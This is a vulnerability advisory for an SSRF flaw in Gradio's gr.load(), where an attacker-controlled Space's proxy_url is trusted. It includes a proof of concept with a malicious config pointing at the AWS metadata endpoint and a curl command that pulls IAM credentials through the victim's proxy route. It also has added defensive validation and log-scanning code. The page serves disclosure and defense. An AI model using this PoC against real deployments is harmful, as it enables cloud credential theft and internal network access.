
CVE-2026-28416

Gradio has SSRF via Malicious `proxy_url` Injection in `gr.load()` Config Processing

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim's server by hosting a malicious Gradio Space. When a victim application uses gr.load() to load an attacker-controlled Space, the malicious proxy_url from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim's infrastructure.

Details

The vulnerability exists in Gradio's config processing flow when loading external Spaces:

  1. Config Fetching (gradio/external.py:630): gr.load() calls Blocks.from_config(), which fetches and processes the remote Space's configuration.
  2. Proxy URL Trust (gradio/blocks.py:1231-1233): The proxy_url from the untrusted config is added directly to self.proxy_urls:

   ```python
   if config.get("proxy_url"):
       self.proxy_urls.add(config["proxy_url"])
   ```

  3. Built-in Proxy Route (gradio/routes.py:1029-1031): Every Gradio app automatically exposes a /proxy={url_path} endpoint:

   ```python
   @router.get("/proxy={url_path:path}", dependencies=[Depends(login_check)])
   async def reverse_proxy(url_path: str):
   ```

  4. Host-based Validation (gradio/routes.py:365-368): The validation only checks whether the URL's host matches the host of any trusted proxy_url:

   ```python
   is_safe_url = any(
       url.host == httpx.URL(root).host for root in self.blocks.proxy_urls
   )
   ```

An attacker can set proxy_url to http://169.254.169.254/ (AWS metadata) or any internal service, and the victim's server will proxy requests to those endpoints.

PoC

Full PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6

1. Attacker creates a malicious Gradio Space that returns this config:

```
{
    "mode": "blocks",
    "components": [...],
    "proxy_url": "http://169.254.169.254/"  # AWS metadata endpoint
}
```

2. Victim loads the malicious Space:

```python
import gradio as gr
demo = gr.load("attacker/malicious-space")
demo.launch(server_name="0.0.0.0", server_port=7860)
```

3. Attacker exploits the proxy:

```bash
# Fetch AWS credentials through victim's server
curl "http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"
```
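The root cause in the Details section is that the host-match check accepts whatever host the remote config names, so an allowlist seeded from untrusted input is no allowlist at all. The following is an added example written for this page; it is not Gradio's code and not the fix shipped in 6.6.0. It shows a hardened validation that an operator could apply before a config's proxy_url is trusted (rejecting non-HTTP schemes, private, loopback and link-local IP literals, and any host not on an explicit operator allowlist), and reuses that same check to flag /proxy= requests in access logs like the curl request above. The function names, the TRUSTED_PROXY_HOSTS placeholder and the sample log lines are all constructed for the example.

```python
"""Hardened proxy-target validation plus a log check for /proxy= abuse.

Added example, not Gradio's own code or fix. The names
is_trusted_proxy_target, accept_proxy_url_from_config and
find_suspicious_proxy_requests are hypothetical, and the allowlist and
log lines below are constructed sample data.
"""
import ipaddress
import re
from urllib.parse import unquote, urlparse

# Operator-controlled allowlist of hosts the app is expected to proxy to.
# Constructed placeholder; a real deployment lists its own trusted hubs.
TRUSTED_PROXY_HOSTS = {"example-hub.invalid"}


def is_trusted_proxy_target(url: str) -> bool:
    """Return True only if ``url`` may be forwarded by the proxy route.

    Unlike a host-equality check against values taken from a remote config,
    this never derives trust from the target itself: the scheme must be
    http/https, IP literals that are not globally routable are refused
    (10/8, 172.16/12, 192.168/16, 127/8, 169.254/16 which covers cloud
    metadata, ::1, fc00::/7, fe80::/10, 0.0.0.0 ...), and the host must be
    on the operator's explicit allowlist.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = parsed.hostname
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname, not an IP literal
    if ip is not None and not ip.is_global:
        return False
    # Caveat: an allowlisted hostname can still resolve to an internal
    # address (DNS rebinding); resolve it and re-check the resulting IP at
    # request time as well.
    return host.lower() in TRUSTED_PROXY_HOSTS


def accept_proxy_url_from_config(config: dict, proxy_urls: set) -> bool:
    """Hardened counterpart of the config step on the page.

    Adds config["proxy_url"] to ``proxy_urls`` only if it passes
    is_trusted_proxy_target; returns whether it was added.
    """
    url = config.get("proxy_url")
    if not url or not is_trusted_proxy_target(url):
        return False
    proxy_urls.add(url)
    return True


# Matches the request line of a common-log-format entry and captures the
# target that follows /proxy= (up to the space before the HTTP version).
PROXY_PATH_RE = re.compile(r'"(?:GET|POST) [^"]*?/proxy=(?P<target>[^ "]+)')

# Constructed sample access log: two requests aimed at internal addresses,
# one legitimate proxy request, one unrelated request.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] "GET /gradio_api/proxy=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2026:10:00:01 +0000] "GET /gradio_api/proxy=http://example-hub.invalid/file=logo.png HTTP/1.1" 200 2048',
    '10.0.0.7 - - [01/Jan/2026:10:00:02 +0000] "GET /gradio_api/info HTTP/1.1" 200 128',
    '10.0.0.5 - - [01/Jan/2026:10:00:03 +0000] "GET /gradio_api/proxy=http://10.0.0.12:5432/ HTTP/1.1" 502 0',
]


def find_suspicious_proxy_requests(log_lines):
    """Return (line_number, target) for /proxy= requests whose target fails
    is_trusted_proxy_target. Targets are percent-decoded before checking."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = PROXY_PATH_RE.search(line)
        if not match:
            continue
        target = unquote(match.group("target"))
        if not is_trusted_proxy_target(target):
            hits.append((number, target))
    return hits


if __name__ == "__main__":
    for number, target in find_suspicious_proxy_requests(SAMPLE_ACCESS_LOG):
        print(f"line {number}: untrusted proxy target {target}")
```

Running the block flags lines 1 and 4 of the sample log (the metadata endpoint and the internal database port) and leaves the allowlisted request alone. The same predicate gates what gets added to the allowlist in the first place, which is the property the host-equality check on the page lacks.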

Impact

Who is impacted:

  • Any Gradio application that uses gr.load() to load external/untrusted Spaces
  • HuggingFace Spaces that compose or embed other Spaces
  • Enterprise deployments where Gradio apps have access to internal networks

Attack scenarios:

  • Cloud credential theft: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials
  • Internal service access: Reach databases, admin panels, and APIs on private networks
  • Network reconnaissance: Map internal infrastructure through the victim
  • Data exfiltration: Access sensitive internal APIs and services

Package Versions Affected

No items found.


CVSS

Severity: High
Base Score: 8.2
CVSS Version: 3.1
Score Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N


References

  • https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9
  • https://nvd.nist.gov/vuln/detail/CVE-2026-28416
  • https://github.com/gradio-app/gradio/commit/fc7c01ea1e581ef70be98fddf003b0c91315c7cc
  • https://github.com/gradio-app/gradio
  • https://github.com/gradio-app/gradio/releases/tag/gradio%406.6.0


Basic Information

Base CVSS: 8.2
EPSS Probability: 0.00018%
EPSS Percentile: 0.04857%
Introduced Version: 0, 4.38.0, 3.34.0, 3.33.0, 3.17.1b1, 3.9
Fix Available: 6.6.0
